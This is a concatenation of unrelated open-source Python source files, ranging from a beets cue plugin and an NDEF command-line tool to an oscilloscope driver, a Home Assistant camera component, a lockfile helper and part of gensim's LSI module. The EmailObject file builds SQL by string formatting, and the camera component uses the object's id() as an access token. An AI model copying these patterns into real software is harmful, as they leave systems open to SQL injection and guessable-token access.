        self.config.add({
            'keep_before': .1,
            'keep_after': .9,
        })
        # self.register_listener('import_task_start', self.look_for_cues)

    def candidates(self, items, artist, album, va_likely):
        # Album-level matching is not implemented. (This used to drop into
        # pdb.set_trace(), which froze any non-interactive import.)
        return ()

    def item_candidates(self, item, artist, album):
        folder = path.dirname(item.path)
        # Bug fix: `glob` is imported as a function (`from glob import glob`),
        # so the previous `glob.glob(...)` raised AttributeError.
        cues = glob(path.join(folder, "*.cue"))
        if not cues:
            return
        if len(cues) > 1:
            self._log.info(u"Found multiple cue files doing nothing: {0}",
                           list(map(displayable_path, cues)))
            # Bug fix: actually do nothing, as the log message promises,
            # instead of falling through and splitting with cues[0].
            return
        cue_file = cues[0]
        self._log.info("Found {} for {}", displayable_path(cue_file), item)
        try:
            # careful: will ask for input in case of conflicts
            command_output(['shnsplit', '-f', cue_file, item.path])
        except (subprocess.CalledProcessError, OSError):
            self._log.exception(u'shnsplit execution failed')
            return
        # shnsplit writes split-trackNN.wav files next to the source file.
        tracks = glob(path.join(folder, "*.wav"))
        self._log.info("Generated {0} tracks", len(tracks))
        for t in tracks:
            # TODO: real titles/ids would have to come from the cue sheet.
            title = "dunno lol"
            track_id = "wtf"
            index = int(path.basename(t)[len("split-track"):-len(".wav")])
            yield TrackInfo(title, track_id, index=index, artist=artist)
| clinton-hall/nzbToMedia | libs/common/beetsplug/cue.py | Python | gpl-3.0 | 1,898 |
import hashlib
import sys
import datetime
class EmailObject:
    """In-memory representation of one e-mail plus SQL value-list helpers.

    NOTE(review): the fetch* helpers build SQL fragments by string
    concatenation, so callers must not feed them untrusted text.
    """

    def __init__(self, sender, date, subject, body):
        self.sender = sender
        # Strip the weekday prefix and timezone suffix before parsing.
        # TODO: FIX THIS CODE TO BE MORE ROBUST
        self.date = datetime.datetime.strptime(date[5:25], '%d %b %Y %H:%M:%S')
        self.body = body
        self.subject = subject
        self.emailId = self.createEmailId()

    def createEmailId(self):
        """Derive a stable numeric id from the header fields and body."""
        digest = hashlib.md5()
        stamp = self.date.strftime('%Y-%m-%d %H:%M:%S')
        digest.update((self.sender + stamp + self.subject).encode())
        digest.update(self.body.encode())
        # Fold the 128-bit digest into the platform's integer range.
        return int(digest.hexdigest(), 16) % sys.maxsize

    def fetchEmailMain(self):
        """Return the VALUES tuple literal for the main email table."""
        stamp = self.date.strftime('%Y-%m-%d %H:%M:%S')
        return "('%s','%s','%s',%s)" % (self.sender, stamp, self.subject, self.emailId)

    def fetchEmailBodySql(self):
        """Return the VALUES tuple literal for the email body table."""
        return "(%s,'%s')" % (self.emailId, self.body)

    def __str__(self):
        parts = [
            "Sender: '%s'" % self.sender,
            "Date: '%s'" % self.date.strftime('%Y-%m-%d %H:%M:%S'),
            "Subject: '%s'" % self.subject,
            "Body: " + self.body,
        ]
        return "\n".join(parts) + "\n"
| liamneath1/SUMOWaferBackend | PythonBackend/EmailObject.py | Python | mit | 1,333 |
"""
Specialization of einops for torch.
Unfortunately, torch's jit scripting mechanism isn't strong enough,
and to have scripting supported at least for layers,
a number of changes is required, and this layer helps.
Importantly, whole lib is designed so that you can't use it
"""
from typing import Dict, List
import torch
from einops.einops import TransformRecipe, _reconstruct_from_shape_uncached
class TorchJitBackend:
    """
    Completely static backend that mimics part of normal backend functionality
    but restricted to torch stuff only
    """

    @staticmethod
    def reduce(x: torch.Tensor, operation: str, reduced_axes: List[int]):
        # torch has no multi-axis prod, so collapse one axis at a time from
        # the innermost outwards (keeps earlier axis indices valid).
        if operation == 'prod':
            for axis in sorted(reduced_axes, reverse=True):
                x = x.prod(dim=axis)
            return x
        if operation == 'min':
            return x.amin(dim=reduced_axes)
        if operation == 'max':
            return x.amax(dim=reduced_axes)
        if operation == 'sum':
            return x.sum(dim=reduced_axes)
        if operation == 'mean':
            return x.mean(dim=reduced_axes)
        raise NotImplementedError('Unknown reduction ', operation)

    @staticmethod
    def transpose(x, axes: List[int]):
        return x.permute(axes)

    @staticmethod
    def stack_on_zeroth_dimension(tensors: List[torch.Tensor]):
        return torch.stack(tensors)

    @staticmethod
    def tile(x, repeats: List[int]):
        return x.repeat(repeats)

    @staticmethod
    def add_axes(x, n_axes: int, pos2len: Dict[int, int]):
        # -1 in expand() keeps the existing length; each new axis gets its
        # real length from pos2len.
        expand_shape = [-1] * n_axes
        for position, length in pos2len.items():
            x = torch.unsqueeze(x, position)
            expand_shape[position] = length
        return x.expand(expand_shape)

    @staticmethod
    def is_float_type(x):
        return x.dtype in [torch.float16, torch.float32, torch.float64]

    @staticmethod
    def shape(x):
        return x.shape

    @staticmethod
    def reshape(x, shape: List[int]):
        return x.reshape(shape)
# mirrors einops.einops._apply_recipe
def apply_for_scriptable_torch(recipe: TransformRecipe, tensor: torch.Tensor, reduction_type: str) -> torch.Tensor:
    """Apply a transform recipe to *tensor* using only TorchJitBackend ops."""
    init_shapes, reduced_axes, axes_reordering, added_axes, final_shapes = \
        _reconstruct_from_shape_uncached(recipe, TorchJitBackend.shape(tensor))
    # reshape -> reduce -> transpose -> add axes -> final reshape
    result = TorchJitBackend.reshape(tensor, init_shapes)
    if len(reduced_axes) > 0:
        result = TorchJitBackend.reduce(result, operation=reduction_type, reduced_axes=reduced_axes)
    result = TorchJitBackend.transpose(result, axes_reordering)
    if len(added_axes) > 0:
        result = TorchJitBackend.add_axes(result, n_axes=len(axes_reordering) + len(added_axes), pos2len=added_axes)
    return TorchJitBackend.reshape(result, final_shapes)
# -*- coding: utf-8 -*-
from functools import wraps
import os.path
import click
import ndef
# Text shown by --version; includes the ndeflib version the tool runs against.
version_message = '%%(prog)s %%(version)s (ndeflib %s)' % ndef.__version__
# Directory holding one Python module per subcommand.
command_plugins = os.path.join(os.path.dirname(__file__), 'commands')
def echo(*args, **kwargs):
    """Write normal output to stdout (thin wrapper around click.echo)."""
    click.echo(*args, **kwargs)


def info(*args):
    """Print a green progress message to stderr unless --silent was given."""
    if click.get_current_context().meta['output-logmsg'] != 'silent':
        click.secho(*args, err=True, fg='green')


def dmsg(*args):
    """Print a yellow debug message to stderr only when --debug was given."""
    if click.get_current_context().meta['output-logmsg'] == 'debug':
        click.secho(*args, err=True, fg='yellow')


def warn(*args):
    """Print a red warning to stderr regardless of verbosity."""
    click.secho(*args, err=True, fg='red')
class CommandGroup(click.Group):
    """Click group that discovers subcommands from the commands directory.

    A command may be invoked by its full lower-case module name or by the
    abbreviation formed from the upper-case letters of that name.
    """

    def list_commands(self, ctx):
        """Return the sorted list of command module base names."""
        command_list = []
        # All commands are separate Python files within the
        # command_plugins folder.
        for filename in sorted(os.listdir(command_plugins)):
            basename, extension = os.path.splitext(filename)
            if extension == '.py' and basename != '__init__':
                command_list.append(basename)
        return command_list

    def get_command(self, ctx, name):
        """Resolve *name* (full or abbreviated) to the command's `cmd` object.

        Returns None implicitly when no module matches, which click reports
        as an unknown command.
        """
        name = name.lower()  # all commands treated case insensitive
        # From list_commands() we get the command file names without
        # extension. We use the upper case letters to construct the
        # abbreviated name and import the module if the requested
        # command name matches either the lower case full or short
        # name.
        for cmd_name in self.list_commands(ctx):
            cmd_abbr = ''.join(x for x in cmd_name if 'A' <= x <= 'Z')
            if name in (cmd_name.lower(), cmd_abbr.lower()):
                module = 'ndeftool.commands.' + cmd_name
                return __import__(module, None, None, ['cmd']).cmd

    def format_commands(self, ctx, formatter):
        """Write the command table (short and long names) to the help page."""
        rows = []
        # From list_commands() we get the command file names without
        # extension. We use the upper case letters to construct the
        # abbreviated name and store lower case versions of short and
        # long command name.
        for cmd_name in self.list_commands(ctx):
            cmd_abbr = ''.join(x for x in cmd_name if 'A' <= x <= 'Z')
            cmd_help = self.get_command(ctx, cmd_name).short_help or ''
            rows.append((cmd_abbr.lower(), cmd_name.lower(), cmd_help))
        # We want the command list to be sorted by abbreviated command
        # name with the shortest names first.
        rows = sorted(rows, key=lambda x: '%02d %s' % (len(x[0]), x[0]))
        rows = [('%s, %s' % (a, n) if a != n else a, h) for a, n, h in rows]
        with formatter.section('Commands'):
            formatter.write_dl(rows)
# Chained group: subcommands run in sequence, each receiving the message
# built so far (see process_commands below).
@click.command(cls=CommandGroup, chain=True)
@click.version_option(message=version_message)
@click.option('--relax', 'errors', flag_value='relax',
              help='Ignore some errors when decoding.')
@click.option('--ignore', 'errors', flag_value='ignore',
              help='Ignore all errors when decoding.')
@click.option('--silent', 'logmsg', flag_value='silent',
              help='Suppress all progress information.')
@click.option('--debug', 'logmsg', flag_value='debug',
              help='Output debug progress information.')
@click.pass_context
def main(ctx, **kwargs):
    """Create or inspect NFC Data Exchange Format messages.
    The ndeftool provides a number of commands to create or inspect
    NDEF messages. All commands can be chained to an internal
    processing pipeline and the whole fit into a command shell
    pipeline.
    \b
    ndeftool load FILE1 load FILE2 save FILE3
    ndeftool load - load FILE2 < FILE1 > FILE3
    cat FILE1 | ndeftool load - load FILE2 | hexdump -Cv
    The ndeftool processing pipeline builds an NDEF message from left
    to right, each command adds some NDEF record(s) to the message
    until it is either send to standard output or consumed by an
    ndeftool command (unless the --keep option is given to a command
    that would otherwise consume the message).
    \b
    ndeftool text 'one' text 'two' print --keep > two_text_records.ndef
    ndeftool text 'one' text 'two' save --keep two_text_records.ndef print
    A new pipeline is started after ndeftool command that consumed the
    current message. This can be used to generate or inspect multiple
    messages.
    \b
    ndeftool text 'one' save text_1.ndef text 'two' save text_2.ndef
    ndeftool load text_1.ndef print load text_2.ndef print
    Each command has it's own help page: 'ndeftool <cmd> --help'
    """
    # Stash the global flags in the context meta dict where subcommands and
    # the logging helpers (info/dmsg) can read them.
    ctx.meta['decode-errors'] = kwargs['errors'] or 'strict'
    ctx.meta['output-logmsg'] = kwargs['logmsg'] or 'normal'
@main.resultcallback()
def process_commands(processors, **kwargs):
    """Run each chained command's processor over the accumulating message,
    then write the encoded octet stream to stdout."""
    message = None
    for processor in processors:
        message = processor(message)
    dmsg('records = ' + str(message))
    # No trailing newline: output may feed a binary pipeline.
    echo(b''.join(ndef.message_encoder(message)), nl=False)
def command_processor(command_function):
    """Decorator used by subcommands to defer their work.

    Calling the decorated function with the command's own arguments does
    not run it; it returns a one-argument ``processor`` closure that later
    applies the command to the current message (see process_commands).
    """
    @wraps(command_function)
    def wrapper(*args, **kwargs):
        def processor(message):
            return command_function(message, *args, **kwargs)
        return processor
    return wrapper
| nfcpy/ndeftool | src/ndeftool/cli.py | Python | isc | 5,162 |
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2012-2016 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilent2000A import *
import numpy as np
import struct
from .. import ivi
from .. import fgen
# Output modes supported by the scope's embedded waveform generator option.
OutputMode = set(['function', 'arbitrary'])
# Maps IVI standard-waveform names to the instrument's SCPI function names.
StandardWaveformMapping = {
    'sine': 'sin',
    'square': 'squ',
    #'triangle': 'tri',
    'ramp_up': 'ramp',
    #'ramp_down',
    #'dc'
    'pulse': 'puls',
    'noise': 'nois',
    'dc': 'dc',
    'sinc': 'sinc',
    'exprise': 'expr',
    'expfall': 'expf',
    'cardiac': 'card',
    'gaussian': 'gaus'
}
class agilent3000A(agilent2000A, fgen.ArbWfm, fgen.ArbFrequency,
                   fgen.ArbChannelWfm):
    "Agilent InfiniiVision 3000A series IVI oscilloscope driver"

    def __init__(self, *args, **kwargs):
        self.__dict__.setdefault('_instrument_id', '')
        super(agilent3000A, self).__init__(*args, **kwargs)
        self._analog_channel_name = list()
        self._analog_channel_count = 4
        self._digital_channel_name = list()
        self._digital_channel_count = 16
        self._channel_count = self._analog_channel_count + self._digital_channel_count
        self._bandwidth = 1e9
        self._horizontal_divisions = 10
        self._vertical_divisions = 8
        # wavegen option
        self._output_count = 1
        self._output_standard_waveform_mapping = StandardWaveformMapping
        self._output_mode_list = OutputMode
        self._arbitrary_sample_rate = 0
        self._arbitrary_waveform_number_waveforms_max = 0
        self._arbitrary_waveform_size_max = 8192
        self._arbitrary_waveform_size_min = 2
        self._arbitrary_waveform_quantum = 1
        self._identity_description = "Agilent InfiniiVision 3000A X-series IVI oscilloscope driver"
        self._identity_supported_instrument_models = ['DSOX3012A','DSOX3014A','DSOX3024A',
            'DSOX3032A','DSOX3034A','DSOX3052A','DSOX3054A','DSOX3104A','MSOX3012A','MSOX3014A',
            'MSOX3024A','MSOX3032A','MSOX3034A','MSOX3052A','MSOX3054A','MSOX3104A']
        self._init_outputs()
        self._init_channels()

    # -- cached wavegen output properties (no instrument I/O) --

    def _get_output_arbitrary_gain(self, index):
        index = ivi.get_index(self._output_name, index)
        return self._output_arbitrary_gain[index]

    def _set_output_arbitrary_gain(self, index, value):
        index = ivi.get_index(self._output_name, index)
        value = float(value)
        self._output_arbitrary_gain[index] = value

    def _get_output_arbitrary_offset(self, index):
        index = ivi.get_index(self._output_name, index)
        return self._output_arbitrary_offset[index]

    def _set_output_arbitrary_offset(self, index, value):
        index = ivi.get_index(self._output_name, index)
        value = float(value)
        self._output_arbitrary_offset[index] = value

    def _get_output_arbitrary_waveform(self, index):
        index = ivi.get_index(self._output_name, index)
        return self._output_arbitrary_waveform[index]

    def _set_output_arbitrary_waveform(self, index, value):
        index = ivi.get_index(self._output_name, index)
        value = str(value)
        self._output_arbitrary_waveform[index] = value

    def _get_arbitrary_sample_rate(self):
        return self._arbitrary_sample_rate

    def _set_arbitrary_sample_rate(self, value):
        value = float(value)
        self._arbitrary_sample_rate = value

    def _get_arbitrary_waveform_number_waveforms_max(self):
        return self._arbitrary_waveform_number_waveforms_max

    def _get_arbitrary_waveform_size_max(self):
        return self._arbitrary_waveform_size_max

    def _get_arbitrary_waveform_size_min(self):
        return self._arbitrary_waveform_size_min

    def _get_arbitrary_waveform_quantum(self):
        return self._arbitrary_waveform_quantum

    def _arbitrary_waveform_clear(self, handle):
        pass

    def _arbitrary_waveform_configure(self, index, handle, gain, offset):
        """Select an arbitrary waveform and its gain/offset for an output."""
        self._set_output_arbitrary_waveform(index, handle)
        self._set_output_arbitrary_gain(index, gain)
        self._set_output_arbitrary_offset(index, offset)

    def _arbitrary_waveform_create(self, data):
        return "handle"

    def _get_output_arbitrary_frequency(self, index):
        index = ivi.get_index(self._output_name, index)
        return self._output_arbitrary_frequency[index]

    def _set_output_arbitrary_frequency(self, index, value):
        index = ivi.get_index(self._output_name, index)
        value = float(value)
        self._output_arbitrary_frequency[index] = value

    def _arbitrary_waveform_create_channel_waveform(self, index, data):
        """Upload *data* as the arbitrary waveform for output *index*.

        Accepts a list of floats, a 1D array, a 2D single-row/column array,
        or anything ivi.get_sig understands. Samples are clipped to [-1, 1]
        and sent as little-endian 32-bit floats.
        """
        y = None
        x = None
        if type(data) == list and type(data[0]) == float:
            # list
            # Bug fix: `array` was an undefined name (NameError); numpy is
            # imported as `np`.
            y = np.array(data)
        elif type(data) == np.ndarray and len(data.shape) == 1:
            # 1D array
            y = data
        elif type(data) == np.ndarray and len(data.shape) == 2 and data.shape[0] == 1:
            # 2D array, height 1
            y = data[0]
        elif type(data) == np.ndarray and len(data.shape) == 2 and data.shape[1] == 1:
            # 2D array, width 1
            y = data[:,0]
        else:
            x, y = ivi.get_sig(data)
        if len(y) % self._arbitrary_waveform_quantum != 0:
            raise ivi.ValueNotSupportedException()
        # Pack all samples, clipped to [-1, 1], then join once instead of
        # rebuilding the bytes object per sample (was quadratic).
        chunks = []
        for f in y:
            # clip at -1 and 1
            if f > 1.0: f = 1.0
            if f < -1.0: f = -1.0
            chunks.append(struct.pack('<f', f))
        raw_data = b''.join(chunks)
        self._write_ieee_block(raw_data, ':%s:arbitrary:data ' % self._output_name[index])
        return self._output_name[index]
| Diti24/python-ivi | ivi/agilent/agilent3000A.py | Python | mit | 6,792 |
# -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2001-2014 Micronaet SRL (<http://www.micronaet.it>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from . import used
from . import report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| Micronaet/micronaet-production | mrp_future_used_material/__init__.py | Python | agpl-3.0 | 1,054 |
# pylint: disable=too-many-lines
"""
Component to interface with cameras.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/camera/
"""
import asyncio
import logging
from aiohttp import web
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.config_validation import PLATFORM_SCHEMA # noqa
from homeassistant.components.http import HomeAssistantView
DOMAIN = 'camera'
DEPENDENCIES = ['http']
SCAN_INTERVAL = 30
ENTITY_ID_FORMAT = DOMAIN + '.{}'
STATE_RECORDING = 'recording'
STATE_STREAMING = 'streaming'
STATE_IDLE = 'idle'
ENTITY_IMAGE_URL = '/api/camera_proxy/{0}?token={1}'
@asyncio.coroutine
def async_setup(hass, config):
    """Setup the camera component."""
    # One EntityComponent tracks camera entities from every platform.
    component = EntityComponent(
        logging.getLogger(__name__), DOMAIN, hass, SCAN_INTERVAL)
    # HTTP endpoints serving still images and MJPEG streams.
    hass.http.register_view(CameraImageView(hass, component.entities))
    hass.http.register_view(CameraMjpegStream(hass, component.entities))
    yield from component.async_setup(config)
    return True
class Camera(Entity):
    """The base class for camera entities."""

    def __init__(self):
        """Initialize a camera."""
        self.is_streaming = False

    @property
    def access_token(self):
        """Access token for this camera.

        NOTE(review): this is just the object's id(), stable only for the
        lifetime of the instance — not a cryptographic secret.
        """
        return str(id(self))

    @property
    def should_poll(self):
        """No need to poll cameras."""
        return False

    @property
    def entity_picture(self):
        """Return a link to the camera feed as entity picture."""
        return ENTITY_IMAGE_URL.format(self.entity_id, self.access_token)

    @property
    def is_recording(self):
        """Return true if the device is recording."""
        return False

    @property
    def brand(self):
        """Camera brand."""
        return None

    @property
    def model(self):
        """Camera model."""
        return None

    def camera_image(self):
        """Return bytes of camera image.

        Subclasses must override this (or async_camera_image).
        """
        raise NotImplementedError()

    @asyncio.coroutine
    def async_camera_image(self):
        """Return bytes of camera image.
        This method must be run in the event loop.
        """
        # Run the (potentially blocking) sync implementation in an executor.
        image = yield from self.hass.loop.run_in_executor(
            None, self.camera_image)
        return image

    @asyncio.coroutine
    def handle_async_mjpeg_stream(self, request):
        """Generate an HTTP MJPEG stream from camera images.
        This method must be run in the event loop.
        """
        response = web.StreamResponse()
        response.content_type = ('multipart/x-mixed-replace; '
                                 'boundary=--jpegboundary')
        yield from response.prepare(request)

        def write(img_bytes):
            """Write image to stream."""
            # Each frame is one multipart section with its own headers.
            response.write(bytes(
                '--jpegboundary\r\n'
                'Content-Type: image/jpeg\r\n'
                'Content-Length: {}\r\n\r\n'.format(
                    len(img_bytes)), 'utf-8') + img_bytes + b'\r\n')

        last_image = None
        try:
            while True:
                img_bytes = yield from self.async_camera_image()
                if not img_bytes:
                    break
                # Only send a frame when the image actually changed.
                if img_bytes is not None and img_bytes != last_image:
                    write(img_bytes)
                    # Chrome seems to always ignore first picture,
                    # print it twice.
                    if last_image is None:
                        write(img_bytes)
                    last_image = img_bytes
                    yield from response.drain()
                yield from asyncio.sleep(.5)
        finally:
            yield from response.write_eof()

    @property
    def state(self):
        """Camera state."""
        if self.is_recording:
            return STATE_RECORDING
        elif self.is_streaming:
            return STATE_STREAMING
        else:
            return STATE_IDLE

    @property
    def state_attributes(self):
        """Camera state attributes."""
        attr = {
            'access_token': self.access_token,
        }
        if self.model:
            attr['model_name'] = self.model
        if self.brand:
            attr['brand'] = self.brand
        return attr
class CameraView(HomeAssistantView):
    """Base CameraView."""

    # Auth is checked manually in get() so the per-camera token can be
    # accepted as an alternative to normal authentication.
    requires_auth = False

    def __init__(self, hass, entities):
        """Initialize a basic camera view."""
        super().__init__(hass)
        self.entities = entities

    @asyncio.coroutine
    def get(self, request, entity_id):
        """Start a get request."""
        camera = self.entities.get(entity_id)
        if camera is None:
            return web.Response(status=404)
        # Accept either a normally authenticated request or the camera's
        # access token passed as a query parameter.
        authenticated = (request.authenticated or
                         request.GET.get('token') == camera.access_token)
        if not authenticated:
            return web.Response(status=401)
        response = yield from self.handle(request, camera)
        return response

    @asyncio.coroutine
    def handle(self, request, camera):
        """Handle the camera request (implemented by subclasses)."""
        raise NotImplementedError()
class CameraImageView(CameraView):
    """Camera view to serve an image."""

    url = "/api/camera_proxy/{entity_id}"
    name = "api:camera:image"

    @asyncio.coroutine
    def handle(self, request, camera):
        """Serve a single still image from the camera."""
        image = yield from camera.async_camera_image()
        # A camera that cannot produce an image yields a server error.
        if image is None:
            return web.Response(status=500)
        return web.Response(body=image)
class CameraMjpegStream(CameraView):
    """Camera View to serve an MJPEG stream."""

    url = "/api/camera_proxy_stream/{entity_id}"
    name = "api:camera:stream"

    @asyncio.coroutine
    def handle(self, request, camera):
        """Serve the camera's continuous MJPEG stream."""
        yield from camera.handle_async_mjpeg_stream(request)
| srcLurker/home-assistant | homeassistant/components/camera/__init__.py | Python | mit | 5,960 |
import os

# NOTE(review): 'cls' is the Windows clear-screen command; on POSIX systems
# this call does nothing useful ('clear' would be needed) — confirm target OS.
os.system('cls')
opcao = 'c'
# Keep echoing the menu line until the user types anything other than 'c'.
while opcao == 'c':
    print("Opcao ==> c")
    opcao = input("digite uma opcao: ")
#
# Copyright (c) 2008--2011 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import os
import sys
import fcntl
from errno import EWOULDBLOCK, EEXIST
import fcntl
class LockfileLockedException(Exception):
    """Thrown ONLY when the pid lockfile is already locked by another process."""
    pass
class Lockfile:
    """class that provides simple access to a PID-style lockfile.

    methods: __init__(lockfile), acquire(), and release()
    NOTE: currently acquires upon init
    The *.pid file will be acquired, or an LockfileLockedException is raised.

    NOTE: this module uses Python 2 syntax (``except X, e`` and the
    three-expression ``raise``); it is not Python 3 compatible as written.
    """

    def __init__(self, lockfile, pid=None):
        """create (if need be), and acquire lock on lockfile

        lockfile example: '/var/run/up2date.pid'
        """
        # cleanup the path and assign it.
        self.lockfile = os.path.abspath(
            os.path.expanduser(
                os.path.expandvars(lockfile)))
        # pid recorded inside the lockfile; defaults to the current process.
        self.pid = pid
        if not self.pid:
            self.pid = os.getpid()

        # create the directory structure
        dirname = os.path.dirname(self.lockfile)
        if not os.path.exists(dirname):
            try:
                os.makedirs(dirname)
            except OSError, e:
                if hasattr(e, 'errno') and e.errno == EEXIST:
                    # race condition... dirname exists now.
                    pass
                else:
                    raise

        # open the file -- non-destructive read-write, unless it needs
        # to be created XXX: potential race condition upon create?
        self.f = os.open(self.lockfile, os.O_RDWR|os.O_CREAT|os.O_SYNC)

        self.acquire()

    def acquire(self):
        """acquire the lock; else raise LockfileLockedException."""
        try:
            # non-blocking exclusive flock: fails immediately with
            # EWOULDBLOCK if another process holds the lock.
            fcntl.flock(self.f, fcntl.LOCK_EX|fcntl.LOCK_NB)
        except IOError, e:
            if e.errno == EWOULDBLOCK:
                # Python 2 three-expression raise: re-raise with the
                # original traceback attached.
                raise LockfileLockedException(
                    "cannot acquire lock on %s." % self.lockfile), None, sys.exc_info()[2]
            else:
                raise
        # set FD_CLOEXEC (F_SETFD, 1): the descriptor -- and with it the
        # flock -- is released automatically if this process exec()s.
        fcntl.fcntl(self.f, fcntl.F_SETFD, 1)
        # truncate and write the pid
        os.ftruncate(self.f, 0)
        os.write(self.f, str(self.pid) + '\n')

    def release(self):
        # Remove the lock file
        # NOTE(review): the file is unlinked *before* the flock is dropped;
        # a process that opened the old inode in the meantime could acquire
        # a lock on a path that no longer exists -- confirm this race is
        # acceptable for the callers.
        os.unlink(self.lockfile)
        fcntl.flock(self.f, fcntl.LOCK_UN)
        os.close(self.f)
def main():
    """test code

    Manual smoke test: acquires ./test.pid, holds it for 10 seconds, then
    releases it. Run two copies concurrently to observe the contention path
    (the second copy prints the error and exits with status -1).
    """
    try:
        L = Lockfile('./test.pid')
    except LockfileLockedException, e:
        # another process holds the lock
        sys.stderr.write("%s\n" % e)
        sys.exit(-1)
    else:
        print "lock acquired "
        print "...sleeping for 10 seconds"
        import time
        time.sleep(10)
        L.release()
        print "lock released "
if __name__ == '__main__':
    # test code
    # main() returns None on success, so `main() or 0` exits with status 0;
    # the lock-contention path exits earlier via sys.exit(-1) inside main().
    sys.exit(main() or 0)
| hustodemon/spacewalk | client/rhel/rhnlib/rhn/rhnLockfile.py | Python | gpl-2.0 | 3,331 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010 Radim Rehurek <radimrehurek@seznam.cz>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Module for Latent Semantic Analysis (aka Latent Semantic Indexing) in Python.
Implements fast truncated SVD (Singular Value Decomposition). The SVD
decomposition can be updated with new observations at any time, for an online,
incremental, memory-efficient training.
This module actually contains several algorithms for decomposition of large corpora, a
combination of which effectively and transparently allows building LSI models for:
* corpora much larger than RAM: only constant memory is needed, independent of
the corpus size
* corpora that are streamed: documents are only accessed sequentially, no
random access
* corpora that cannot be even temporarily stored: each document can only be
seen once and must be processed immediately (one-pass algorithm)
* distributed computing for very large corpora, making use of a cluster of
machines
Wall-clock `performance on the English Wikipedia <http://radimrehurek.com/gensim/wiki.html>`_
(2G corpus positions, 3.2M documents, 100K features, 0.5G non-zero entries in the final TF-IDF matrix),
requesting the top 400 LSI factors:
====================================================== ============ ==================
algorithm serial distributed
====================================================== ============ ==================
one-pass merge algorithm 5h14m 1h41m
multi-pass stochastic algo (with 2 power iterations) 5h39m N/A [1]_
====================================================== ============ ==================
*serial* = Core 2 Duo MacBook Pro 2.53Ghz, 4GB RAM, libVec
*distributed* = cluster of four logical nodes on three physical machines, each
with dual core Xeon 2.0GHz, 4GB RAM, ATLAS
.. [1] The stochastic algo could be distributed too, but most time is already spent
reading/decompressing the input from disk in its 4 passes. The extra network
traffic due to data distribution across cluster nodes would likely make it
*slower*.
"""
import logging
import sys
import numpy as np
import scipy.linalg
import scipy.sparse
from scipy.sparse import sparsetools
from gensim import interfaces, matutils, utils
from gensim.models import basemodel
from six import iterkeys
from six.moves import xrange
logger = logging.getLogger(__name__)
# accuracy defaults for the multi-pass stochastic algo
P2_EXTRA_DIMS = 100 # set to `None` for dynamic P2_EXTRA_DIMS=k
P2_EXTRA_ITERS = 2
def clip_spectrum(s, k, discard=0.001):
    """
    Given eigenvalues `s`, return how many factors should be kept to avoid
    storing spurious (tiny, numerically unstable) values.

    The tail of the spectrum whose relative combined mass is smaller than
    min(`discard`, 1/k) is ignored. The result is clipped against `k`
    (= never return more than `k`).
    """
    # fraction of total energy lying *beyond* each position in the spectrum
    tail_mass = np.abs(1.0 - np.cumsum(s / np.sum(s)))
    threshold = min(discard, 1.0 / k)
    # keep one factor more than the number of positions still above the threshold
    significant = 1 + len(np.where(tail_mass > threshold)[0])
    kept = min(k, significant)  # never return more than k
    logger.info("keeping %i factors (discarding %.3f%% of energy spectrum)",
                kept, 100 * tail_mass[kept - 1])
    return kept
def asfarray(a, name=''):
    """Return `a` in FORTRAN (column-major) order, converting only if needed.

    `name` is used purely for the debug log message.
    """
    if a.flags.f_contiguous:
        # already column-major; hand back the very same array object
        return a
    logger.debug("converting %s array %s to FORTRAN order", a.shape, name)
    return np.asfortranarray(a)
def ascarray(a, name=''):
    """Return `a` in C (row-major) contiguous order, converting only if needed.

    `name` is used purely for the debug log message.
    """
    if a.flags.contiguous:
        # already C-contiguous; hand back the very same array object
        return a
    logger.debug("converting %s array %s to C order", a.shape, name)
    return np.ascontiguousarray(a)
class Projection(utils.SaveLoad):
    # Holds the truncated decomposition (u, s) of a corpus and knows how to
    # merge itself with another Projection (incremental SVD update).
    def __init__(self, m, k, docs=None, use_svdlibc=False, power_iters=P2_EXTRA_ITERS, extra_dims=P2_EXTRA_DIMS):
        """
        Construct the (U, S) projection from a corpus `docs`. The projection can
        be later updated by merging it with another Projection via `self.merge()`.

        This is the class taking care of the 'core math'; interfacing with corpora,
        splitting large corpora into chunks and merging them etc. is done through
        the higher-level `LsiModel` class.

        `m` is the number of features (terms), `k` the number of requested
        factors. With `docs=None` an empty projection is created (u = s = None).
        """
